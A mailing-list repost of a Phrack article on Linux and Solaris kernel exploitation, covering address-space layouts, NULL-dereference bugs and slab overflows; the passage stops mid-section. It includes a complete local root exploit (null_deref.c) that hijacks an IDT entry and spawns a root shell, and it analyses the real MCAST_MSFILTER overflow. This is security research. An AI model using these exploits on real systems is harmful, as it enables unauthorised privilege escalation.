[Full-disclosure] PHRACK 64: ATTACKING THE CORE

Subject: [Full-disclosure] PHRACK 64: ATTACKING THE CORE
Date: Fri, 25 May 2007 09:42:58 -0400
            _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 6               (* *)
          | - |                                              | - |
          |   | Attacking the Core : Kernel Exploiting Notes |   |
          |   |                                              |   |
          |   |       By sgrakkyu <sgrakkyu@antifork.org>    |   |
          |   |          twiz <twiz@email.it>                |   |
          |   |                                              |   |
          (______________________________________________________)



                             ==Phrack Inc.==

               Volume 0x00, Issue 0x00, Phile #0x00 of 0x00


|=------------=[ Attacking the Core : Kernel Exploiting Notes ]=---------=|
|=-----------------------------------------------------------------------=|
|=-------------=[ sgrakkyu@antifork.org and twiz@email.it ]=-------------=|
|=------------------------=[ February 12 2007 ]=-------------------------=|


------[  Index 

  1 - The playground 

    1.1 - Kernel/Userland virtual address space layouts
    1.2 - Dummy device driver and real vulnerabilities
    1.3 - Notes about information gathering

  2 - Kernel vulnerabilities and bugs 

    2.1 - NULL/userspace dereference vulnerabilities
        2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c
    2.2 - The Slab Allocator
        2.2.1 - Slab overflow vulnerabilities
        2.2.2 - Slab overflow exploiting : MCAST_MSFILTER
        2.2.3 - Slab overflow vulnerabilities : Solaris notes 
    2.3 - Stack overflow vulnerabilities 
        2.3.1 - UltraSPARC exploiting
        2.3.2 - A reliable Solaris/UltraSPARC exploit
    2.4 - A primer on logical bugs : race conditions 
        2.4.1 - Forcing a kernel path to sleep
        2.4.2 - AMD64 and race condition exploiting: sendmsg

  3 - Advanced scenarios 
    
    3.1 - PaX KERNEXEC & separated kernel/user space 
    3.2 - Remote Kernel Exploiting 
        3.2.1 - The Network Contest
        3.2.2 - Stack Frame Flow Recovery
        3.2.3 - Resources Restoring 
        3.2.4 - Copying the Stub
        3.2.5 - Executing Code in Userspace Context [Gimme Life!]
        3.2.6 - The Code : sendtwsk.c

  4 - Final words  

  5 - References

  6 - Sources : drivers and exploits [stuff.tgz]      

------[ Intro 


Recent years have seen a growing interest in kernel-based exploitation.
The spread of "security prevention" approaches (no-exec stack, no-exec
heap, ascii-armored library mmapping, mmap/stack and generally virtual
layout randomization, just to point out the best known) has made, and
keeps making, userland exploitation harder and harder. Moreover, a lot
of auditing work has been done on application code, so that new bugs are
generally more complex to handle and exploit.

Attention has thus turned towards the core of the operating systems,
towards kernel (in)security. This paper attempts to give an insight into
kernel exploitation, with examples for IA-32, UltraSPARC and AMD64.
Linux and Solaris will be the target operating systems. More precisely,
each of the three main exploiting demonstration categories is covered
mainly on one architecture in turn : slab (IA-32), stack (UltraSPARC)
and race condition (AMD64). The details explained in those 'deep focus'
sections apply, though, almost in toto to all the other exploiting
scenarios.

Since exploitation examples are surely interesting but usually do not
show the "effective" complexity of taking advantage of vulnerabilities,
a couple of working real-life exploits will be presented too.


------[ 1 - The playground 


Let's point one thing out before starting : "bruteforcing" and "kernel"
aren't two words that go well together. One can't just crash the kernel
over and over while trying to guess the right return address or the
right alignment. An error in kernel exploitation usually leads to a
crash, a panic or an unstable state of the operating system.
The "information gathering" step is therefore definitely important, just
like a good knowledge of the operating system layout.
 

---[ 1.1 - Kernel/Userland virtual address space layouts 

From the userland point of view we see almost nothing of the kernel
layout, nor of the addresses at which it is mapped [there are indeed a
few pieces of information that we can gather from userland, and we're
going to point them out later].
Nevertheless it is from userland that we have to start to carry out our
attack, so a good knowledge of the kernel virtual memory layout (and
implementation) is, indeed, a must.

There are two possible address space layouts :

- kernel space mapped alongside user space (kernel page tables are
  replicated in every process; the virtual address space is split in two
  parts, one for the kernel and one for the processes).
  Kernels running on x86, AMD64 and sun4m/sun4d architectures usually
  have this kind of implementation.

- separated kernel and process address spaces (both can use the whole
  address space). Such an implementation, to be efficient, requires
  dedicated support from the underlying architecture. This is the case
  of the primary and secondary context registers used in conjunction
  with the ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.

To see the main advantage (from an exploiting perspective) of the first
approach over the second one we need to introduce the concept of
"process context".
Any time the CPU is in "supervisor" mode (the well-known ring0 on IA-32),
the kernel path it is executing is said to be in interrupt context if it
has no backing process.
Code in interrupt context can't block (for example waiting for demand
paging to bring in a referenced userspace page): the scheduler would not
know what to put to sleep (and what to wake up afterwards).

Code running in process context has instead an associated process
(usually the one that "generated" the kernel code path, for example by
issuing a system call) and is free to block/sleep (and so it's free to
reference the userland virtual address space).
 
This is good news on systems which implement a combined user/kernel
address space since, while executing at kernel level, we can dereference
(or jump to) userland addresses.
The advantages are obvious (and many) :

  - we don't have to "guess" where our shellcode will be and we can
    write it in C (which makes it easier to write, if needed, long and
    somewhat complex recovery code)

  - we don't have to face the problem of finding a suitably large and
    safe place to store it.

  - we don't have to worry about no-exec page protection (we're free to
    mmap/mremap as we wish and, obviously, to load the code directly in
    the .text segment, if we don't need to patch it at runtime).

  - we can mmap large portions of the address space and fill them with
    nops or nop-alike code/data (useful when we don't completely
    control the return address or the dereference)

  - we can easily take advantage of the so-called "NULL pointer
    dereference bugs" ("technically" described later on)
    
The space left to the kernel is thus limited in size : on the x86
architecture it is 1 Gigabyte on Linux, while on Solaris it fluctuates
depending on the amount of physical memory (check
usr/src/uts/i86pc/os/startup.c inside the OpenSolaris sources).
This fluctuation turned out to be necessary to avoid wasting virtual
memory ranges as much as possible and, at the same time, to avoid
pressure on the space reserved to the kernel.

The only limitation to the kernel (and process) virtual space on systems
implementing separated userland/kernelland address spaces is given by
the architecture (UltraSPARC I and II can reference only 44 bits of the
whole 64-bit addressable space. This VA-hole lies between
0x0000080000000000 and 0xFFFFF7FFFFFFFFFF).

This memory model indeed makes exploitation harder, because we can't
directly dereference userspace. The previously cited NULL pointer
dereferences are pretty much un-exploitable.
Moreover, we can't rely on "valid" userland addresses as a place to
store our shellcode (or any other kernel emulation data), nor can we
"return to userspace".

We won't go into more detail here with a theoretical description of the
architectures (you can check the reference manuals at [1], [2] and [3])
since we've preferred to couple the analysis of the architectural and
operating system internals relevant to exploitation with the
presentation of the actual exploit code.


---[ 1.2 - Dummy device driver and real vulnerabilities 

As we said in the introduction, we're going to present a couple of real
working exploits, hoping to give a better insight into the whole kernel
exploitation process.
We've written exploits for :

-  MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
   overflow exploiting

-  sendmsg vulnerability [5], used to demonstrate an effective race
   condition (and a stack overflow on AMD64)

-  madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real
   remote exploit for the Linux kernel. That exploit was already
   released at [22] before the release of this paper (which has a more
   detailed discussion of it and another 'dummy based' exploit for a
   more complex scenario)

Moreover, we've written a dummy device driver (for Linux and Solaris) to
demonstrate the presented techniques with examples.
A more complex remote exploit (as previously mentioned) and an exploit
capable of circumventing Linux with PaX/KERNEXEC (and
userspace/kernelspace separation) will be presented too.

---[ 1.3 - Notes about information gathering 


Remember when we were talking about information gathering ? Nearly every
operating system 'exports' to userland information useful for developing
and debugging. Both Linux and Solaris (we're not taking 'security
patches' into account for now) expose to the user, in readable form, the
list and addresses of their exported symbols (symbols that module
writers can reference) : /proc/ksyms on Linux 2.4, /proc/kallsyms on
Linux 2.6 and /dev/ksyms on Solaris (the first two are text files, the
last one is an ELF with a SYMTAB section).
Those files provide useful information about what is compiled into the
kernel and at what addresses some functions and structs live, addresses
that we can gather at runtime and use to increase the reliability of our
exploit.

But this information could be missing in some environments : the /proc
filesystem could be unmounted or the kernel compiled (along with some
security switch/patch) so as not to export it.
This is more a Linux problem than a Solaris one, nowadays. Solaris
exports way more information than Linux to userland (probably to aid
debugging without having the sources). Every module is shown with its
loading address by 'modinfo', the proc interface exports the address of
the kernel 'proc_t' struct to userland (giving a crucial entrypoint, as
we will see, for exploitation on UltraSPARC systems) and the 'kstat'
utility lets us investigate many kernel parameters.

In the absence of /proc (and /sys, on Linux 2.6) there's another place
we can gather information from : the kernel image on the filesystem.
There are actually two possible favourable situations :

  - the image is somewhere on the filesystem and it's readable, which is
    the default for many Linux distributions and for Solaris

  - the target host is running a default kernel image, either from the
    installation or taken from a repository. In that situation it is
    just a matter of recreating the same image on our system and
    inferring from it.
    This should always be possible on Solaris, given the patchlevel
    (taken from 'uname' and/or 'showrev -p').
    Things could change if OpenSolaris takes off, we'll see.

The presence of the image (or the possibility of knowing it) is crucial
for the exploitation of the KERNEXEC/separated userspace/kernelspace
environment presented at the end of the paper.

Assuming we don't have exported information and the careful
administrator has removed the running kernel images (and, logically, in
the absence of kernel memory leaks ;)) we have one last resource that
can help in exploitation : the architecture.
Let's take the x86 arch : a process running at ring3 may query the
logical address and offset/attribute of the processor tables
GDT, LDT, IDT, TSS :

- through 'sgdt' we can get the base address and max offset of the GDT
- through 'sldt' we can get the GDT entry index of the current LDT
- through 'sidt' we can get the base address and max offset of the IDT
- through 'str'  we can get the GDT entry index of the current TSS

The best choice (not the only one possible) in that case is the IDT. The
possibility of changing just a single byte in a controlled place of it
leads to a fully working, reliable exploit [*].

[*] The idea here is to modify the MSB of the base_address of an IDT
    entry and so "hijack" the exception handler. Logically we need a
    controlled byte overwrite, or a partially controlled one with a byte
    value below the 'kernelbase' value, so that we can make it point
    into the userland portion. We won't go into deeper detail about the
    IDT layout/implementation here, you can find it inside the processor
    manuals [1] and kad's phrack59 article "Handling the Interrupt
    Descriptor Table" [6].
    The NULL pointer dereference exploit presented for Linux implements
    this technique.

As important as the information gathering step is the recovery step,
which aims to leave the kernel in a consistent state. This step is
usually performed inside the shellcode itself or just after the exploit
has (successfully) taken place, by using /dev/kmem or a loadable module
(if possible).
This step is logically exploit-dependent, so we will just explain it
along with the examples (making a categorization would be pointless).


------[ 2 - Kernel vulnerabilities and bugs 

 
We start now with an excursus over the various types of kernel
vulnerabilities. The kernel is a big and complex beast, so even if we're
going to track down some "common" scenarios, there are many more
possible "logical bugs" that can lead to a system compromise.

We will cover stack based, "heap" (better, slab) based and
NULL/userspace dereference vulnerabilities. As an example of a "logical
bug", a whole chapter is dedicated to race conditions and to techniques
to force a kernel path to sleep/reschedule (along with a real exploit
for the sendmsg [5] vulnerability on AMD64).

We won't cover in this paper the range of vulnerabilities related to
virtual memory logical errors, since those have already been extensively
described and cleverly exploited, on Linux, by the iSEC [7] people.
Moreover, it's nearly useless, in our opinion, to create "crafted"
demonstrative vulnerable code for logical bugs and we weren't aware of
any _public_ vuln of this kind on Solaris. If you are, feel free to
submit it, we'll be happy to work on it ;).


---[ 2.1 - NULL/userspace dereference vulnerabilities 


This kind of vulnerability derives from the use of a pointer that is
uninitialized (generally having a NULL value) or trashed, so that it
points inside the userspace part of the virtual memory address space.
The normal behaviour of an operating system in such a situation is an
oops or a crash (depending on the severity of the dereference) while
attempting to access unmapped memory.

But we can, obviously, mmap that memory range and let the kernel find
"valid" malicious data. That's more than enough to gain root privileges.
We can delineate two possible scenarios :

  - instruction pointer modification (direct call/jmp dereference,
    called function pointers inside a struct, etc)

  - "controlled" write on kernelspace

The first kind of vulnerability is really trivial to exploit, it's just
a matter of mmapping the referenced page and putting our shellcode
there.
If the dereferenced address is a struct containing a function pointer
(or a chain of structs with a function pointer somewhere), it is just a
matter of emulating those structs in userspace, making the function
pointer point to our shellcode and letting/forcing the kernel path to
call it.

We won't show an example of this kind of vulnerability since this is the
"last stage" of any more complex exploit (as we will see, we'll always
be trying, when possible, to jump to userspace).

The second kind of vulnerability is a little more complex, since we
can't directly modify the instruction pointer, but we have the
possibility to write anywhere in kernel memory (with controlled or
uncontrolled data).

Let's have a look at this snippet of code, taken from our Linux dummy
device driver :

< stuff/drivers/linux/dummy.h >

[...]

struct user_data_ioctl
{
  int size;  
  char *buffer;
};

< / >

< stuff/drivers/linux/dummy.c >

static int alloc_info(unsigned long sub_cmd)
{
  struct user_data_ioctl user_info;
  struct info_user *info;
  struct user_perm *perm;
  
[...]

  if(copy_from_user(&user_info,
                    (void __user*)sub_cmd,
                    sizeof(struct user_data_ioctl)))
    return -EFAULT;

  if(user_info.size > MAX_STORE_SIZE)  [1]
    return -ENOENT;

  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
  if(!info)
    return -ENOMEM;

  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
  if(!perm)
    return -ENOMEM;

  info->timestamp = 0;//sched_clock();
  info->max_size  = user_info.size;
  info->data = kmalloc(user_info.size, GFP_KERNEL); [2]
  /* unchecked alloc */

  perm->uid = current->uid;
  info->data->perm = perm; [3]

  glob_info = info;

[...]

static int store_info(unsigned long sub_cmd)
{

[...]

  glob_info->data->perm->uid = current->uid; [4]

[...]   

< / > 

Due to the integer signedness issue at [1], we can pass a negative size
that passes the check and becomes a huge value in the kmalloc at [2],
making it fail (and so return NULL).
The lack of checking at that point leaves a NULL value in the info->data
pointer, which is later used, at [3] and also inside store_info at [4],
to save the current uid value.

What we have to do to exploit such code is simply mmap the zero page
(0x00000000 - NULL) in userspace, make the kmalloc fail by passing a
negative value and then prepare a 'fake' data struct in the previously
mmapped area, providing a working pointer for 'perm' and thus being able
to write our 'uid' anywhere in memory.

At that point we have many ways to exploit the vulnerable code
(exploiting while being able to write some arbitrary or, as in this
case, partially controlled data anywhere is indeed limited only by
imagination), but it's better to find a "working everywhere" way.

As we said above, we're going to use the IDT and overwrite one of its
entries (more precisely a Trap Gate, so that we're able to hijack an
exception handler and redirect the code flow towards userspace).
Each IDT entry is 64 bits (8 bytes) long and we want to overwrite its
'base_offset' value, to be able to modify the MSB of the exception
handler routine address and thus redirect it below the PAGE_OFFSET
(0xc0000000) value.

Since the higher 16 bits are in the 7th and 8th byte of the IDT entry,
that is our target, but at [4] we're writing 4 bytes for the 'uid'
value, so we're going to trash the next entry too. It is better to use
two adjacent 'seldom used' entries (in case, for some strange reason,
something goes wrong) and we have decided to use the 4th and 5th
entries : #OF (Overflow Exception) and #BR (BOUND Range Exceeded
Exception).

At that point we don't completely control the return address, but that's
not a big problem, since we can mmap a large region of userspace and
fill it with NOPs, to prepare a comfortable and safe landing point for
our exploit. The last thing we have to do, once we get the control flow
in userspace, is to restore the original IDT entries, either hardcoding
the values inside the shellcode stub or using an lkm or /dev/kmem
patching code.

At that point our exploit is ready to be launched for our first
'rootshell'.

As a last (indeed obvious) note, NULL dereference vulnerabilities are
only exploitable on operating systems with a 'combined userspace and
kernelspace' memory model.


---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c

< stuff/expl/null_deref.c >

#include <sys/ioctl.h>
#include <stdio.h>
#include <stdint.h>     /* uint16_t, uint32_t */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>     /* getuid(), execve() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE          "/dev/dummy"
#define NOP             0x90
#define STACK_SIZE      8192

//#define STACK_SIZE 4096


#define PAGE_SIZE       0x1000
#define PAGE_OFFSET     12
#define PAGE_MASK       ~(PAGE_SIZE -1)

#define ANTANI          "antani"

uint32_t        bound_check[2]={0x00,0x00};
extern void     do_it();
uid_t           UID;

void do_bound_check()
{
        asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : "a"(0xFF));
}

/* simple shell spawn */
void get_root()
{
  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", "BASH_HISTORY=/dev/null",
                   "HISTORY=/dev/null", "history=/dev/null",
                   "PATH=/bin:/sbin:/usr/bin:/usr/sbin:"
                   "/usr/local/bin:/usr/local/sbin",
                   NULL };

  execve("/bin/sh", argv, envp);
  fprintf(stderr, "[**] Execve failed\n");
  exit(-1);
}



/* this function is called by fake exception handler: take 0 uid
   and restore trashed entry */
void give_priv_and_restore(unsigned int thread)
{
  int i;
  unsigned short addr;
  unsigned int* p = (unsigned int*)thread;

  /* simple trick */
  for(i=0; i < 0x100; i++)
  if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) &&
      (p[i+3] == UID) )
    p[i] = 0, p[i+1] = 0;

}


#define CODE_SIZE       0x1e


void dummy(void)
{
asm("do_it:;"
    /* after bound exception EIP points again to the bound instruction */
    "addl $6, (%%esp);"
    "pusha;"
    "movl %%esp, %%eax;"
    "andl %0, %%eax;"
    "movl (%%eax), %%eax;"
    "add $100, %%eax;"
    "pushl %%eax;"
    "movl $give_priv_and_restore, %%ebx;"
    "call *%%ebx;"
    "popl %%eax;"
    "popa;"
    "iret;"
    "nop;nop;nop;nop;"
   :: "i"( ~(STACK_SIZE -1))
);
return;
}



struct idt_struct
{
  uint16_t limit;
  uint32_t base;
} __attribute__((packed));


static char *allocate_frame_chunk(unsigned int base_addr,
                                  unsigned int size,
                                  void* code_addr)
{
  unsigned int round_addr = base_addr & PAGE_MASK;
  unsigned int diff       = base_addr - round_addr;
  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & PAGE_MASK;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE,
                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
                        -1,   /* no backing file for anonymous maps */
                        0);
  if(map_addr == MAP_FAILED)
    return MAP_FAILED;

  if(code_addr)
  {
    memset(map_addr, NOP, len);
    memcpy(map_addr, code_addr, size);
  }
  else
    memset(map_addr, 0x00, len);

  return (char*)base_addr;
}

static inline unsigned int *get_zero_page(unsigned int size)
{
  return (unsigned int*)allocate_frame_chunk(0x00000000, size, NULL);
}

#define BOUND_ENTRY 5
unsigned int get_BOUND_address()
{
        struct idt_struct idt;
        asm volatile("sidt %0\t\n" : "=m"(idt));
        return idt.base + (8*BOUND_ENTRY);
}

unsigned int prepare_jump_code()
{
  UID = getuid();       /* set global uid */
  unsigned int base_address = ((UID & 0x0000FF00) << 16) +
                              ((UID & 0xFF) << 16);
  printf("Using base address of: 0x%08x-0x%08x\n", base_address,
         base_address + 0x20000 -1);
  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
  if(addr == MAP_FAILED)
  {
    perror("unable to mmap jump code");
    exit(-1);
  }

  memset((void*)base_address, NOP, 0x20000);
  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);

  return base_address;
}

int main(int argc, char *argv[])
{
  struct user_data_ioctl user_ioctl;
  unsigned int *zero_page, *jump_pages, save_ptr;

  zero_page = get_zero_page(PAGE_SIZE);
  if(zero_page == MAP_FAILED)
  {
    perror("mmap: unable to map zero page");
    exit(-1);
  }

  jump_pages = (unsigned int*)prepare_jump_code();


  int ret, fd = open(DEVICE,  O_RDONLY), alloc_size;

  if(argc > 1)
    alloc_size = atoi(argv[1]);
  else
   alloc_size  = PAGE_SIZE-8;

  if(fd < 0)
  {
    perror("open: dummy device");
    exit(-1);
  }

  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
  user_ioctl.size = alloc_size;


  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_ALLOC_INFO");
    exit(-1);
  }


  /* save old struct ptr stored by kernel in the first word */
  save_ptr = *zero_page;

  /* compute the new ptr inside the IDT table between BOUND and
     INVALIDOP exception */
  printf("IDT bound: %x\n", get_BOUND_address());
  *zero_page = get_BOUND_address() + 6;

  user_ioctl.size=strlen(ANTANI)+1;
  user_ioctl.buffer=ANTANI;

  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);

  getchar();
  do_bound_check();

  /* restore trashed ptr */
  *zero_page = save_ptr;

  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_FREE_INFO");
    exit(-1);
  }

  get_root();

  return 0;
}

< / > 



---[ 2.2 - The Slab Allocator 


The main purpose of a slab allocator is to speed up the
allocation/deallocation of heavily used small 'objects' and to reduce
the fragmentation that would derive from using the page-based allocator.
Both Solaris and Linux implement a slab memory allocator which derives
from the one described by Bonwick [8] in 1994 and implemented in Solaris
2.4.

The idea behind it is, basically : objects of the same type are grouped
together inside a cache in their constructed form. The cache is divided
in 'slabs', each consisting of one or more contiguous page frames.
Every time the operating system needs more objects, new page frames (and
thus new 'slabs') are allocated and the objects inside them are
constructed.
Whenever a caller needs one of these objects, it gets back an already
prepared one, which it only has to fill with valid data. When an object
is 'freed', it doesn't get destructed, but is simply returned to its
slab and marked as available.

Caches are created for the most used objects/structs inside the
operating system, for example those representing inodes, virtual memory
areas, etc.
General-purpose caches, suitable for small memory allocations, are
created too, one for each power of two, so that internal fragmentation
is guaranteed to stay below 50%.
The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly
these general-purpose caches. Since it is up to the caller to 'clean'
the object returned from a slab (which could contain 'dead' data),
wrapper functions that return zeroed memory are usually provided too
(kzalloc(), kmem_zalloc()).

An important (from an exploiting perspective) 'feature' of the slab
allocator is the 'bufctl', which is meaningful only inside a free object
and is used to indicate the 'next free object'.
A list of free objects that behaves just like a LIFO is thus created,
and we'll see shortly that it is crucial for reliable exploitation.

Each slab has an associated controlling struct (kmem_slab_t on Solaris,
slab_t on Linux) which is stored inside the slab (at the start on Linux,
at the end on Solaris) if the object size is below a given limit (1/8 of
the page), or outside it otherwise.
Since there's a 'cache' per 'object type', it's not guaranteed at all
that those 'objects' will exactly fill the pages of the slab up to a
page boundary. That 'free' space (space not belonging to any object,
nor to the slab controlling struct) is used to 'color' the slab,
respecting the object alignment (if 'free' < 'alignment' no coloring
takes place).

The first object is thus saved at a 'different offset' inside the slab,
given by 'color value' * 'alignment' (and, consequently, the same
happens to all the subsequent objects), so that objects of the same size
in different slabs are less likely to end up in the same hardware cache
lines.

We won't go into more detail about the Slab Allocator here, since it is
well and extensively explained in many other places, most notably at
[9], [10], and [11], and we move on to effective exploitation.
Some more implementation details will be given, though, along with the
explanation of the exploiting techniques.


---[ 2.2.1 - Slab overflow vulnerabilities  


NOTE: as we said before, Solaris and Linux have two different functions
to allocate from the general purpose caches, kmem_alloc() and kmalloc().
Those two functions behave basically in the same manner, so from now on
we'll just use 'kmalloc' and 'kmalloc'ed memory' in the discussion,
referring though to both operating systems' implementations.

A slab overflow is simply a write past the buffer boundaries of a
kmalloc'ed object. The result of this overflow can be :

- overwriting an adjacent in-slab object.
- overwriting a page next to the slab one, in the case we're overwriting
  past the last object.
- overwriting the control structure associated with the slab (Solaris
  only)
   
The first case is the one we're going to show an exploit for. The main
idea in such a situation is to fill the slabs (we can track the slab
status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' on
Solaris) so that a new one is necessary.
We do that to be sure that we'll have a 'controlled' bufctl : since all
the slabs were full, we get a new page, along with a 'fresh' bufctl
pointer starting from the first object.

At that point we alloc two objects, free the first one and trigger the
vulnerable code : it will request a new object and overflow right into
the previously allocated second one. If a pointer is stored inside this
second object and then used (after the overflow), it is under our
control.
This approach is very reliable.

The second case is more complex, since we don't have an object with a
pointer or any modifiable data value of interest to overwrite. We still
have one chance, though, using the page frame allocator.
We start eating a lot of memory by requesting the kind of 'page' we want
to overflow into (for example, tons of file descriptors), putting the
memory under pressure. At that point we start freeing a few of them, so
that the total amount freed adds up to a page.
We then start filling the slab so that a new page is requested.
If we've been lucky the new page is going to be just before one of the
previously allocated ones and we now have the chance to overwrite it.
The main point affecting the reliability of such an exploit is :

  - it's not trivial to 'isolate' a given struct/data to mass alloc at
    the first step, without also having other kernel structs/data grow
    together with it.
    An example will clarify : to allocate tons of file descriptors we
    need to create a large number of threads. That translates into the
    allocation of all the related control structs, which could end up
    placed right after our overflowing buffer.

The third case is possible only on Solaris, and only on slabs which keep
objects smaller than 'page_size >> 3'. Since Solaris keeps the kmem_slab
struct at the end of the slab we can use the overflow of the last object
to overwrite data inside it.

In the latter two 'typologies' of exploit presented we have to take slab
coloring into account. Both operating systems store the 'next color
offset' inside the cache descriptor, and update it at every slab
allocation (let's see an example from OpenSolaris sources) :

< usr/src/uts/common/os/kmem.c >

static kmem_slab_t *
kmem_slab_create(kmem_cache_t *cp, int kmflag)
{
[...]
        size_t color, chunks;
[...]
        color = cp->cache_color + cp->cache_align;
        if (color > cp->cache_maxcolor)
                color = cp->cache_mincolor;
        cp->cache_color = color;

< / >

'mincolor' and 'maxcolor' are calculated at cache creation and represent
the boundaries of available coloring :

# uname -a
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
# kstat -n file_cache | grep slab
        slab_alloc                      280
        slab_create                     2
        slab_destroy                    0
        slab_free                       0
        slab_size                       8192
# kstat -n file_cache | grep align
        align                           8
# kstat -n file_cache | grep buf_size
        buf_size                        56
# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
::sizeof kmem_slab_t
sizeof (kmem_slab_t) = 0x38
::kmem_cache ! grep file_cache
00000300005fed88 file_cache                0000 000000       56      290
00000300005fed88::print kmem_cache_t cache_mincolor
cache_mincolor = 0
00000300005fed88::print kmem_cache_t cache_maxcolor
cache_maxcolor = 0x10
00000300005fed88::print kmem_cache_t cache_color
cache_color = 0x10
::quit

As you can see, from kstat we know that 2 slabs have been created and we
know the alignment, which is 8. Object size is 56 bytes and the size of
the in-slab control struct is 56, too. Each slab is 8192 bytes, which,
modulo 56, gives exactly 16, which is the maxcolor value (the color range
is thus 0 - 16, which leads to three possible colorings with an alignment
of 8 : 0, 8 and 16).

Based on the previous snippet of code, we know that the first allocation
had a coloring of 8 ( mincolor == 0 + align == 8 ), the second one of 16
(which is the value still recorded inside the kmem_cache_t).
If we were to exhaust this slab and get a new one we would know for
sure that the coloring would be 0.
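
To make the rotation explicit, here is a small userland model of the
color update done in the kmem_slab_create() excerpt. It is only a
sketch : the struct and function names are made up for illustration, and
it assumes cache_color starts out equal to cache_mincolor.

```c
#include <stddef.h>

/* Minimal model of the fields used by the kmem_slab_create() excerpt. */
struct color_state {
        size_t color;      /* cache_color: last color handed out */
        size_t align;      /* cache_align */
        size_t mincolor;   /* cache_mincolor */
        size_t maxcolor;   /* cache_maxcolor */
};

/* Advance the state as the excerpt does; return the new slab's color. */
size_t next_slab_color(struct color_state *cs)
{
        size_t color = cs->color + cs->align;

        if (color > cs->maxcolor)
                color = cs->mincolor;
        cs->color = color;
        return color;
}
```

With align 8, mincolor 0 and maxcolor 16 (the file_cache values),
successive calls return 8, 16, 0, 8 and so on.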

Linux uses a similar 'circular' coloring too, just look for where
'kmem_cache_t'->colour_next is set and incremented.

Neither operating system decrements the color value when a slab is
freed, so that has to be taken into account too (easy to do on Solaris,
since slab_create counts every slab created so far).


---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER 


Given the technical basis to understand and exploit a slab overflow, it's
time for a practical example.
We're presenting here an exploit for the MCAST_MSFILTER [4] vulnerability
found by iSEC people :

< linux-2.4.24/net/ipv4/ip_sockglue.c >

case MCAST_MSFILTER:
{
        struct sockaddr_in *psin;
        struct ip_msfilter *msf = 0;
        struct group_filter *gsf = 0;
        int msize, i, ifindex;

        if (optlen < GROUP_FILTER_SIZE(0))
                goto e_inval;
        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2]
        if (gsf == 0) {
                err = -ENOBUFS;
                break;
        }
        err = -EFAULT;
        if (copy_from_user(gsf, optval, optlen)) {  [3]
                goto mc_msf_out;
        }
        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4]
                err = EINVAL;
                goto mc_msf_out;
        }
        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);  [1]
        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7]
        if (msf == 0) {
                err = -ENOBUFS;
                goto mc_msf_out;
        }
        
        [...]

        msf->imsf_multiaddr = psin->sin_addr.s_addr;
        msf->imsf_interface = 0;
        msf->imsf_fmode = gsf->gf_fmode;
        msf->imsf_numsrc = gsf->gf_numsrc;
        err = -EADDRNOTAVAIL;
        for (i=0; i<gsf->gf_numsrc; ++i) {  [5]
                psin = (struct sockaddr_in *)&gsf->gf_slist[i];

                if (psin->sin_family != AF_INET) [8]
                        goto mc_msf_out;
                msf->imsf_slist[i] = psin->sin_addr.s_addr; [6]

[...]
        mc_msf_out:
                        if (msf)
                                kfree(msf);
                        if (gsf)
                                kfree(gsf);
                        break;

[...]

< / >

< linux-2.4.24/include/linux/in.h >

#define IP_MSFILTER_SIZE(numsrc) \    [1]
        (sizeof(struct ip_msfilter) - sizeof(__u32) \
        + (numsrc) * sizeof(__u32))

[...]

#define GROUP_FILTER_SIZE(numsrc) \   [4]
        (sizeof(struct group_filter) - \
        sizeof(struct __kernel_sockaddr_storage) \
        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))

< / >


The vulnerability consists of an integer overflow at [1], since we control
the gsf struct as you can see from [2] and [3].
The check at [4] proved to be, initially, a problem, which was resolved
thanks to the slab property of not cleaning objects on free (more on that
shortly).
The for loop at [5] is where we effectively do the overflow, by writing,
at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct over the
previously allocated msf [7] struct (kmalloc'ed with the badly calculated
'msize' value).
This for loop is a godsend, because thanks to the check at [8] we are able
to avoid the classical problem with integer overflow derived bugs (that is
writing _a lot_ after the buffer due to the usually huge value used to
trigger the overflow) and exit cleanly through mc_msf_out.

As explained before, while describing the 'first exploitation approach',
we need to find some object/data that gets kmalloc'ed in the same slab
and which has inside a pointer or some crucial value that would let us
change the execution flow.

We found a solution with the 'struct shmid_kernel' :

< linux-2.4.24/ipc/shm.c >

struct shmid_kernel /* private to the kernel */
{
        struct kern_ipc_perm    shm_perm;
        struct file *           shm_file;
        int                     id;
        [...]
};

[...]

asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
{
        struct shmid_kernel *shp;
        int err, id = 0;

        down(&shm_ids.sem);
        if (key == IPC_PRIVATE) {
                err = newseg(key, shmflg, size);
